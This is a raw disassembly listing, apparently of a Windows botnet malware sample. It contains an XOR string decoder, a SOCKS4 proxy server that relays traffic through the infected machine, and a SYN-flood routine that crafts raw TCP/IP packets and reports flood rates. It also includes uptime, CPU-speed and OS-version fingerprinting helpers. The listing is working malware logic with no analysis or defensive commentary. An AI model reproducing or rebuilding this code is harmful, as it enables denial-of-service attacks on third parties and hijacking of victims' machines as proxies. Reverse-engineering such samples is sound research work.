loc_41034D: ; CODE XREF: sub_4102EE+56�j
xor eax, eax
jmp loc_4103F2
; ---------------------------------------------------------------------------
loc_410354: ; CODE XREF: sub_4102EE+5D�j
mov ecx, [ebp+arg_C]
push ebx
mov bl, byte_4754BC
xor edx, edx
push edi
mov edi, [ebp+arg_8]
test ecx, ecx
jbe short loc_410384
loc_410368: ; CODE XREF: sub_4102EE+94�j
mov al, [edx+edi]
xor al, bl
jz short loc_41037B
cmp al, 0Ah
jz short loc_41037B
cmp al, 0Dh
jz short loc_41037B
cmp al, 5Ch
jnz short loc_41037F
loc_41037B: ; CODE XREF: sub_4102EE+7F�j
; sub_4102EE+83�j ...
inc bl
xor edx, edx
loc_41037F: ; CODE XREF: sub_4102EE+8B�j
inc edx
cmp edx, ecx
jb short loc_410368
loc_410384: ; CODE XREF: sub_4102EE+78�j
cmp ecx, esi
mov byte_4754BC, bl
ja short loc_4103B0
push 15h ; Size
push offset dword_427A54 ; Src
push [ebp+Dst] ; Dst
mov byte_427A61, cl
mov byte_427A65, bl
call _memcpy
add esp, 0Ch
push 15h
jmp short loc_4103D1
; ---------------------------------------------------------------------------
loc_4103B0: ; CODE XREF: sub_4102EE+9E�j
push 17h ; Size
push offset dword_427A3C ; Src
push [ebp+Dst] ; Dst
mov word_427A4A, cx
mov byte_427A4F, bl
call _memcpy
add esp, 0Ch
push 17h
loc_4103D1: ; CODE XREF: sub_4102EE+C0�j
xor eax, eax
pop ecx
cmp [ebp+arg_C], eax
jbe short loc_4103ED
mov edx, [ebp+Dst]
lea esi, [ecx+edx]
loc_4103DF: ; CODE XREF: sub_4102EE+FD�j
mov cl, [eax+edi]
xor cl, bl
mov [esi+eax], cl
inc eax
cmp eax, [ebp+arg_C]
jb short loc_4103DF
loc_4103ED: ; CODE XREF: sub_4102EE+E9�j
mov eax, [ebp+var_4]
pop edi
pop ebx
loc_4103F2: ; CODE XREF: sub_4102EE+61�j
pop esi
leave
retn
sub_4102EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4103F5 proc near ; DATA XREF: sub_409557+510F�o
Source = byte ptr -2D4h
var_D4 = dword ptr -0D4h
Str = byte ptr -0D0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
Dst = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 10h
mov esi, eax
pop ebx
lea edi, [ebp+var_D4]
push 2Ch
mov [ebp+var_4], ebx
pop ecx
rep movsd
push 1
xor esi, esi
pop edi
mov [eax+0A8h], edi
push ebx ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_40]
call dword_42EBB4 ; htons
push 6
push edi
push 2
mov [ebp+var_12], ax
mov [ebp+var_10], esi
call dword_42EC30 ; socket
mov edi, eax
mov eax, [ebp+var_3C]
imul eax, 234h
push ebx
mov dword_43054C[eax], edi
lea eax, [ebp+Dst]
push eax
push edi
call dword_42EBE0 ; bind
test eax, eax
jnz loc_410597
push 0Ah
push edi
call dword_42EBDC ; listen
test eax, eax
jnz loc_410597
push [ebp+var_40]
push [ebp+var_D4]
call sub_408401
pop ecx
push eax
lea eax, [ebp+Source]
push offset aSocks4ServerSt ; "[SOCKS4]: Server started on: %s:%d."
push eax ; Dest
call _sprintf
add esp, 10h
cmp [ebp+var_30], esi
jnz short loc_4104D0
push esi ; int
lea eax, [ebp+Source]
push [ebp+var_34] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_D4] ; int
call sub_405E64
add esp, 14h
loc_4104D0: ; CODE XREF: sub_4103F5+B9�j
; sub_4103F5+172�j ...
lea eax, [ebp+Source]
push eax
call sub_402D63
pop ecx
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push edi
call dword_42EC44 ; accept
push [ebp+var_3C]
mov ebx, eax
movzx eax, [ebp+var_22]
push eax
mov [ebp+var_28], esi
push [ebp+var_20]
call dword_42EC3C ; inet_ntoa
push eax
lea eax, [ebp+Source]
push offset aSocks4ClientCo ; "[SOCKS4]: Client connection from IP: %s"...
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 11h ; int
push eax ; Source
call sub_411C3A
mov [ebp+var_38], eax
imul eax, 234h
mov ecx, [ebp+var_3C]
add esp, 20h
mov dword_430544[eax], ecx
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_D4]
push esi
push eax
push offset sub_4105FA
push esi
push esi
call ds:dword_41B064 ; CreateThread
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, esi
mov dword_430554[ecx], eax
jz short loc_410577
loc_410564: ; CODE XREF: sub_4103F5+180�j
cmp [ebp+var_28], esi
jnz loc_4104D0
push 5
call ds:dword_41B048 ; Sleep
jmp short loc_410564
; ---------------------------------------------------------------------------
loc_410577: ; CODE XREF: sub_4103F5+16D�j
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset aSocks4Failed_0 ; "[SOCKS4]: Failed to start client thread"...
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_4104D0
; ---------------------------------------------------------------------------
loc_410597: ; CODE XREF: sub_4103F5+7B�j
; sub_4103F5+8C�j
push edi
call dword_42EC48 ; closesocket
push [ebp+var_40]
lea eax, [ebp+Source]
push offset aSocks4Failed_1 ; "[SOCKS4]: Failed to start server on Por"...
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_4105DA
push esi ; int
lea eax, [ebp+Source]
push [ebp+var_34] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_D4] ; int
call sub_405E64
add esp, 14h
loc_4105DA: ; CODE XREF: sub_4103F5+1C3�j
lea eax, [ebp+Source]
push eax
call sub_402D63
push [ebp+var_3C]
call sub_411F56
pop ecx
pop ecx
push esi
call ds:dword_41B06C ; ExitThread
pop edi
pop esi
pop ebx
sub_4103F5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4105FA proc near ; DATA XREF: sub_4103F5+14F�o
var_5D4 = dword ptr -5D4h
var_5D0 = dword ptr -5D0h
var_4D0 = byte ptr -4D0h
var_4CF = byte ptr -4CFh
var_4CE = word ptr -4CEh
var_4CC = dword ptr -4CCh
Dst = byte ptr -4C8h
var_C8 = byte ptr -0C8h
Str2 = byte ptr -44h
var_2C = dword ptr -2Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 2Ch
mov esi, eax
pop ecx
lea edi, [ebp+var_C8]
rep movsd
mov esi, [ebp+var_2C]
push 1
mov [ebp+arg_0], esi
imul esi, 234h
pop edi
lea esi, dword_43054C[esi]
mov [eax+0ACh], edi
xor ebx, ebx
mov eax, [esi]
mov [ebp+var_8], 5
mov [ebp+var_5D0], eax
lea eax, [ebp+var_8]
push eax
push ebx
lea eax, [ebp+var_5D4]
push ebx
push eax
push ebx
mov [ebp+var_4], ebx
mov [ebp+var_5D4], edi
call dword_42EB9C ; select
test eax, eax
jnz short loc_41067B
push dword ptr [esi]
call dword_42EC48 ; closesocket
push [ebp+arg_0]
call sub_411F56
pop ecx
push ebx
call ds:dword_41B06C ; ExitThread
loc_41067B: ; CODE XREF: sub_4105FA+67�j
push ebx
lea eax, [ebp+var_4D0]
push 408h
push eax
push dword ptr [esi]
call dword_42EBCC ; recv
test eax, eax
jg short loc_4106AC
push dword ptr [esi]
call dword_42EC48 ; closesocket
push [ebp+arg_0]
call sub_411F56
pop ecx
push ebx
call ds:dword_41B06C ; ExitThread
loc_4106AC: ; CODE XREF: sub_4105FA+98�j
cmp [ebp+var_4D0], 4
jnz loc_4108A6
cmp [ebp+var_4CF], 1
jnz loc_4108A6
cmp [ebp+Str2], bl
jz short loc_410742
lea eax, [ebp+Str2]
push eax ; Str2
lea eax, [ebp+Dst]
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_410742
lea eax, [ebp+Str2]
push eax
lea eax, [ebp+Dst]
push eax ; Args
push offset aSocks4Authenti ; "[SOCKS4]: Authentication failed. Remote"...
call sub_402DD7
push 400h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Dh
call _memset
add esp, 18h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_42EC00 ; send
push dword ptr [esi]
call dword_42EC48 ; closesocket
push [ebp+arg_0]
call sub_411F56
pop ecx
push ebx
call ds:dword_41B06C ; ExitThread
loc_410742: ; CODE XREF: sub_4105FA+CF�j
; sub_4105FA+E5�j
push 10h ; Size
lea eax, [ebp+var_18]
push ebx ; Val
push eax ; Dst
call _memset
mov ax, [ebp+var_4CE]
add esp, 0Ch
mov [ebp+var_16], ax
mov eax, [ebp+var_4CC]
push 6
push edi
push 2
mov [ebp+var_18], 2
mov [ebp+var_14], eax
call dword_42EC30 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_4107DA
call dword_42EB50 ; WSAGetLastError
push eax ; Args
push offset aSocks4ErrorFai ; "[SOCKS4]: Error: Failed to open socket("...
call sub_402DD7
push 400h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Bh
call _memset
add esp, 14h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_42EC00 ; send
push dword ptr [esi]
call dword_42EC48 ; closesocket
push [ebp+arg_0]
call sub_411F56
pop ecx
push ebx
call ds:dword_41B06C ; ExitThread
loc_4107DA: ; CODE XREF: sub_4105FA+181�j
lea eax, [ebp+var_18]
push 10h
push eax
push edi
call dword_42EB60 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_410849
call dword_42EB50 ; WSAGetLastError
push eax ; Args
push offset aSocks4ErrorF_0 ; "[SOCKS4]: Error: Failed to connect to t"...
call sub_402DD7
push 400h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Bh
call _memset
add esp, 14h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_42EC00 ; send
push dword ptr [esi]
call dword_42EC48 ; closesocket
push [ebp+arg_0]
call sub_411F56
pop ecx
push ebx
call ds:dword_41B06C ; ExitThread
loc_410849: ; CODE XREF: sub_4105FA+1F0�j
push 400h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Ah
call _memset
add esp, 0Ch
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_42EC00 ; send
push dword ptr [esi]
push edi
call sub_4108BE
pop ecx
pop ecx
push edi
call dword_42EC48 ; closesocket
push dword ptr [esi]
call dword_42EC48 ; closesocket
push [ebp+arg_0]
call sub_411F56
pop ecx
push ebx
call ds:dword_41B06C ; ExitThread
loc_4108A6: ; CODE XREF: sub_4105FA+B9�j
; sub_4105FA+C6�j
push dword ptr [esi]
call dword_42EC48 ; closesocket
push [ebp+arg_0]
call sub_411F56
pop ecx
push ebx
call ds:dword_41B06C ; ExitThread
sub_4105FA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4108BE proc near ; CODE XREF: sub_4105FA+286�p
Dst = byte ptr -504h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 504h
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
mov esi, 400h
loc_4108D4: ; CODE XREF: sub_4108BE+C5�j
; sub_4108BE+F5�j
mov [ebp+var_100], ebx
mov [ebp+var_104], 1
xor ecx, ecx
lea eax, [ebp+var_100]
loc_4108EC: ; CODE XREF: sub_4108BE+3C�j
mov edx, [ebp+arg_0]
cmp [eax], edx
jz short loc_4108FC
inc ecx
add eax, 4
cmp ecx, 1
jb short loc_4108EC
loc_4108FC: ; CODE XREF: sub_4108BE+33�j
cmp ecx, 1
jnz short loc_410911
mov [ebp+var_FC], edx
mov [ebp+var_104], 2
loc_410911: ; CODE XREF: sub_4108BE+41�j
push esi ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_104]
push edi
push edi
push edi
push eax
push edi
call dword_42EB9C ; select
lea eax, [ebp+var_104]
push eax
push ebx
call dword_42EABC ; __WSAFDIsSet
test eax, eax
jz short loc_410971
push edi
lea eax, [ebp+Dst]
push esi
push eax
push ebx
call dword_42EBCC ; recv
cmp eax, 0FFFFFFFFh
jz short loc_4109B9
push edi
push eax
lea eax, [ebp+Dst]
push eax
push [ebp+arg_0]
call dword_42EC00 ; send
cmp eax, 0FFFFFFFFh
jz short loc_4109B9
loc_410971: ; CODE XREF: sub_4108BE+85�j
lea eax, [ebp+var_104]
push eax
push [ebp+arg_0]
call dword_42EABC ; __WSAFDIsSet
test eax, eax
jz loc_4108D4
push edi
lea eax, [ebp+Dst]
push esi
push eax
push [ebp+arg_0]
call dword_42EBCC ; recv
cmp eax, 0FFFFFFFFh
jz short loc_4109B9
push edi
push eax
lea eax, [ebp+Dst]
push eax
push ebx
call dword_42EC00 ; send
cmp eax, 0FFFFFFFFh
jnz loc_4108D4
loc_4109B9: ; CODE XREF: sub_4108BE+9A�j
; sub_4108BE+B1�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4108BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4109BE proc near ; DATA XREF: sub_409557+315D�o
Dest = byte ptr -414h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_190 = byte ptr -190h
var_110 = dword ptr -110h
Str = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax ; int
lea eax, [ebp+var_190]
push eax ; Str
lea eax, [ebp+var_210]
push eax ; int
call sub_410D0C
push eax
lea eax, [ebp+Dest]
push offset aSynDoneWithFlo ; "[SYN]: Done with flood (%iKB/sec)."
push eax ; Dest
call _sprintf
xor esi, esi
add esp, 18h
cmp [ebp+var_8], esi
jnz short loc_410A3B
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_214] ; int
call sub_405E64
add esp, 14h
loc_410A3B: ; CODE XREF: sub_4109BE+5B�j
lea eax, [ebp+Dest]
push eax
call sub_402D63
push [ebp+var_10]
call sub_411F56
pop ecx
pop ecx
push esi
call ds:dword_41B06C ; ExitThread
pop edi
pop esi
sub_4109BE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410A5A proc near ; CODE XREF: sub_410D0C+3C�p
var_284 = byte ptr -284h
Dest = byte ptr -0F4h
var_B4 = byte ptr -0B4h
var_B3 = byte ptr -0B3h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
var_8C = byte ptr -8Ch
Src = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = word ptr -6Eh
var_58 = dword ptr -58h
Dst = word ptr -50h
var_4E = word ptr -4Eh
var_4C = dword ptr -4Ch
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = word ptr -26h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = byte ptr -20h
var_1E = word ptr -1Eh
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_B3]
mov [ebp+var_B4], bl
rep stosd
stosw
stosb
lea eax, [ebp+var_284]
push eax
push 202h
call dword_42EB38 ; WSAStartup
test eax, eax
jz short loc_410A9A
xor eax, eax
jmp loc_410D08
; ---------------------------------------------------------------------------
loc_410A9A: ; CODE XREF: sub_410A5A+37�j
push 1
pop edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call dword_42EC54 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jz loc_410D00
push esi
lea ecx, [ebp+var_38]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_38], edi
call dword_42EB94 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_410CF6
push 10h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+arg_8]
call dword_42EBB4 ; htons
mov esi, [ebp+arg_0]
push 28h
mov [ebp+var_4E], ax
mov [ebp+var_4C], esi
mov [ebp+var_20], 45h
call dword_42EBB4 ; htons
push [ebp+arg_8]
mov [ebp+var_1E], ax
mov [ebp+var_1C], di
mov [ebp+var_1A], bx
mov [ebp+var_18], 80h
mov [ebp+var_17], 6
mov [ebp+var_16], bx
mov [ebp+var_10], esi
call dword_42EBB4 ; htons
push 4000h
mov [ebp+var_32], ax
mov [ebp+var_2C], ebx
mov [ebp+var_28], 50h
mov [ebp+var_27], 2
call dword_42EBB4 ; htons
mov [ebp+var_26], ax
lea eax, [ebp+var_40]
push eax
mov [ebp+var_22], bx
mov [ebp+arg_8], ebx
call ds:dword_41B08C ; QueryPerformanceFrequency
lea eax, [ebp+var_8]
push eax
call ds:dword_41B088 ; QueryPerformanceCounter
push [ebp+var_3C]
mov eax, [ebp+arg_C]
cdq
push [ebp+var_40]
push edx
push eax
call __allmul
add eax, [ebp+var_8]
mov esi, edx
adc esi, [ebp+var_4]
mov [ebp+var_58], eax
loc_410B85: ; CODE XREF: sub_410A5A+25D�j
; sub_410A5A+26B�j
mov [ebp+var_24], bx
call _rand
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call dword_42EBB4 ; htons
mov [ebp+var_34], ax
call _rand
mov edi, eax
shl edi, 10h
call _rand
or edi, eax
push edi
call dword_42EBB4 ; htons
movzx eax, ax
mov [ebp+var_30], eax
mov eax, [ebp+arg_4]
inc [ebp+arg_4]
push eax
call dword_42EBB0 ; htonl
push 14h
mov [ebp+var_14], eax
mov eax, [ebp+var_10]
pop edi
push edi
mov [ebp+var_74], eax
mov [ebp+var_70], bl
mov [ebp+var_6F], 6
call dword_42EBB4 ; htons
mov [ebp+var_6E], ax
mov eax, [ebp+var_14]
mov [ebp+Src], eax
lea eax, [ebp+Src]
push 20h ; Size
push eax ; Src
lea eax, [ebp+var_B4]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_34]
push edi ; Size
push eax ; Src
lea eax, [ebp+var_94]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_B4]
push 34h
push eax
call sub_40845A
mov [ebp+var_24], ax
lea eax, [ebp+var_20]
push edi ; Size
push eax ; Src
lea eax, [ebp+var_B4]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_34]
push edi ; Size
push eax ; Src
lea eax, [ebp+var_A0]
push eax ; Dst
call _memcpy
push 4 ; Size
lea eax, [ebp+var_8C]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 44h
lea eax, [ebp+var_B4]
push 28h
push eax
call sub_40845A
mov [ebp+var_16], ax
lea eax, [ebp+var_20]
push edi ; Size
push eax ; Src
lea eax, [ebp+var_B4]
push eax ; Dst
call _memcpy
add esp, 14h
lea eax, [ebp+Dst]
push 10h
push eax
push ebx
lea eax, [ebp+var_B4]
push 28h
push eax
push [ebp+var_C]
call dword_42EC14 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_410CCA
add [ebp+arg_8], eax
lea eax, [ebp+var_8]
push eax
call ds:dword_41B088 ; QueryPerformanceCounter
mov eax, [ebp+var_4]
cmp eax, esi
jg short loc_410CF3
jl loc_410B85
mov eax, [ebp+var_8]
cmp eax, [ebp+var_58]
jnb short loc_410CF3
jmp loc_410B85
; ---------------------------------------------------------------------------
loc_410CCA: ; CODE XREF: sub_410A5A+247�j
call dword_42EB50 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset aSynSendErrorD_ ; "[SYN]: Send error: <%d>."
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
push eax
call sub_402D63
add esp, 10h
jmp short loc_410CF6
; ---------------------------------------------------------------------------
loc_410CF3: ; CODE XREF: sub_410A5A+25B�j
; sub_410A5A+269�j
mov ebx, [ebp+arg_8]
loc_410CF6: ; CODE XREF: sub_410A5A+78�j
; sub_410A5A+297�j
push [ebp+var_C]
call dword_42EC48 ; closesocket
pop esi
loc_410D00: ; CODE XREF: sub_410A5A+5B�j
call dword_42EB20 ; WSACleanup
mov eax, ebx
loc_410D08: ; CODE XREF: sub_410A5A+3B�j
pop edi
pop ebx
leave
retn
sub_410A5A endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_410D0C(int,char *Str,int)
sub_410D0C proc near ; CODE XREF: sub_4109BE+3C�p
arg_0 = dword ptr 4
Str = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_4082EB
push [esp+10h+Str] ; Str
mov esi, eax
call _atoi
push [esp+14h+arg_8] ; Str
mov ebx, eax
call _atoi
mov edi, eax
call _rand
cdq
mov ecx, 200h
push edi
idiv ecx
push ebx
lea eax, [edx+esi+100h]
push eax
push esi
call sub_410A5A
add esp, 1Ch
test eax, eax
jnz short loc_410D57
push 1
pop eax
loc_410D57: ; CODE XREF: sub_410D0C+46�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_410D0C endp
; =============== S U B R O U T I N E =======================================
sub_410D66 proc near ; CODE XREF: sub_4021A2+74�p
; sub_409557+4AD5�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
call ds:dword_41B078 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov ebx, 15180h
xor edx, edx
mov esi, ebx
mov edi, 0E10h
mov ebp, edi
push 3Ch
mov ecx, eax
sub ecx, [esp+14h+arg_0]
mov eax, ecx
div esi
mov esi, edx
xor edx, edx
mov eax, esi
div ebp
pop ebp
mov eax, edx
xor edx, edx
div ebp
xor edx, edx
push eax
mov eax, esi
div edi
xor edx, edx
mov esi, offset byte_4754C4
push eax
mov eax, ecx
div ebx
push eax
push offset aDdDhDm ; "%dd %dh %dm"
push 32h ; Count
push esi ; Dest
call __snprintf
add esp, 18h
mov eax, esi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_410D66 endp
; =============== S U B R O U T I N E =======================================
sub_410DCF proc near ; CODE XREF: sub_410E85+290�p
push ebx
push esi
push edi
mov esi, 0F4240h
loc_410DD7: ; CODE XREF: sub_410DCF+2F�j
; sub_410DCF+35�j
rdtsc
push 3E8h
mov edi, edx
mov ebx, eax
call ds:dword_41B048 ; Sleep
rdtsc
sub eax, ebx
push 0
sbb edx, edi
push esi
push edx
push eax
call __aulldiv
mov edi, edx
mov ebx, eax
test edi, edi
ja short loc_410DD7
jb short loc_410E06
cmp ebx, esi
ja short loc_410DD7
loc_410E06: ; CODE XREF: sub_410DCF+31�j
push 0
push 64h
push edi
push ebx
call __aullrem
mov ecx, edx
push 64h
xor edx, edx
mov esi, eax
test ecx, ecx
pop eax
ja short loc_410E79
jb short loc_410E25
cmp esi, 50h
jnb short loc_410E2A
loc_410E25: ; CODE XREF: sub_410DCF+4F�j
push 4Bh
xor edx, edx
pop eax
loc_410E2A: ; CODE XREF: sub_410DCF+54�j
test ecx, ecx
ja short loc_410E79
jb short loc_410E35
cmp esi, 47h
jnb short loc_410E3A
loc_410E35: ; CODE XREF: sub_410DCF+5F�j
push 42h
xor edx, edx
pop eax
loc_410E3A: ; CODE XREF: sub_410DCF+64�j
test ecx, ecx
ja short loc_410E79
jb short loc_410E45
cmp esi, 37h
jnb short loc_410E4A
loc_410E45: ; CODE XREF: sub_410DCF+6F�j
push 32h
xor edx, edx
pop eax
loc_410E4A: ; CODE XREF: sub_410DCF+74�j
test ecx, ecx
ja short loc_410E79
jb short loc_410E55
cmp esi, 26h
jnb short loc_410E5A
loc_410E55: ; CODE XREF: sub_410DCF+7F�j
push 21h
xor edx, edx
pop eax
loc_410E5A: ; CODE XREF: sub_410DCF+84�j
test ecx, ecx
ja short loc_410E79
jb short loc_410E65
cmp esi, 1Eh
jnb short loc_410E6A
loc_410E65: ; CODE XREF: sub_410DCF+8F�j
push 19h
xor edx, edx
pop eax
loc_410E6A: ; CODE XREF: sub_410DCF+94�j
test ecx, ecx
ja short loc_410E79
jb short loc_410E75
cmp esi, 0Ah
jnb short loc_410E79
loc_410E75: ; CODE XREF: sub_410DCF+9F�j
xor eax, eax
xor edx, edx
loc_410E79: ; CODE XREF: sub_410DCF+4D�j
; sub_410DCF+5D�j ...
sub eax, esi
sbb edx, ecx
add eax, ebx
adc edx, edi
pop edi
pop esi
pop ebx
retn
sub_410DCF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410E85 proc near ; CODE XREF: sub_409557+4C81�p
var_7E8 = byte ptr -7E8h
var_668 = byte ptr -668h
var_5E8 = byte ptr -5E8h
var_568 = byte ptr -568h
FullPath = byte ptr -4E8h
var_3E4 = byte ptr -3E4h
Dest = byte ptr -2E8h
var_25C = word ptr -25Ch
var_25A = byte ptr -25Ah
var_15C = byte ptr -15Ch
var_114 = byte ptr -114h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
Dst = byte ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
Drive = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7E8h
push ebx
push esi
lea eax, [ebp+var_CC]
push edi
push eax
mov [ebp+var_4], offset byte_428D64
mov [ebp+var_CC], 94h
call ds:dword_41B144 ; GetVersionExA
xor ebx, ebx
cmp [ebp+var_C8], 4
jnz short loc_410F0C
cmp [ebp+var_C4], ebx
jnz short loc_410EE8
cmp [ebp+var_BC], 1
jnz short loc_410ED2
mov [ebp+var_4], offset a95 ; "95"
loc_410ED2: ; CODE XREF: sub_410E85+44�j
cmp [ebp+var_BC], 2
jnz loc_410F87
mov [ebp+var_4], offset aNt ; "NT"
jmp short loc_410F58
; ---------------------------------------------------------------------------
loc_410EE8: ; CODE XREF: sub_410E85+3B�j
cmp [ebp+var_C4], 0Ah
jnz short loc_410EFA
mov [ebp+var_4], offset a98 ; "98"
jmp short loc_410F4F
; ---------------------------------------------------------------------------
loc_410EFA: ; CODE XREF: sub_410E85+6A�j
cmp [ebp+var_C4], 5Ah
jnz short loc_410F48
mov [ebp+var_4], offset aMe_0 ; "ME"
jmp short loc_410F4F
; ---------------------------------------------------------------------------
loc_410F0C: ; CODE XREF: sub_410E85+33�j
cmp [ebp+var_C8], 5
jnz short loc_410F48
cmp [ebp+var_C4], ebx
jnz short loc_410F26
mov [ebp+var_4], offset a2k ; "2K"
jmp short loc_410F4F
; ---------------------------------------------------------------------------
loc_410F26: ; CODE XREF: sub_410E85+96�j
cmp [ebp+var_C4], 1
jnz short loc_410F38
mov [ebp+var_4], offset aXp ; "XP"
jmp short loc_410F4F
; ---------------------------------------------------------------------------
loc_410F38: ; CODE XREF: sub_410E85+A8�j
cmp [ebp+var_C4], 2
mov [ebp+var_4], offset a2003 ; "2003"
jz short loc_410F4F
loc_410F48: ; CODE XREF: sub_410E85+7C�j
; sub_410E85+8E�j
mov [ebp+var_4], offset a??? ; "???"
loc_410F4F: ; CODE XREF: sub_410E85+73�j
; sub_410E85+85�j ...
cmp [ebp+var_BC], 2
jnz short loc_410F87
loc_410F58: ; CODE XREF: sub_410E85+61�j
cmp [ebp+var_B8], bl
jz short loc_410F87
lea eax, [ebp+var_B8]
push eax
lea eax, [ebp+Dest]
push [ebp+var_4]
push offset aSS_5 ; "%s (%s)"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
add esp, 10h
mov [ebp+var_4], eax
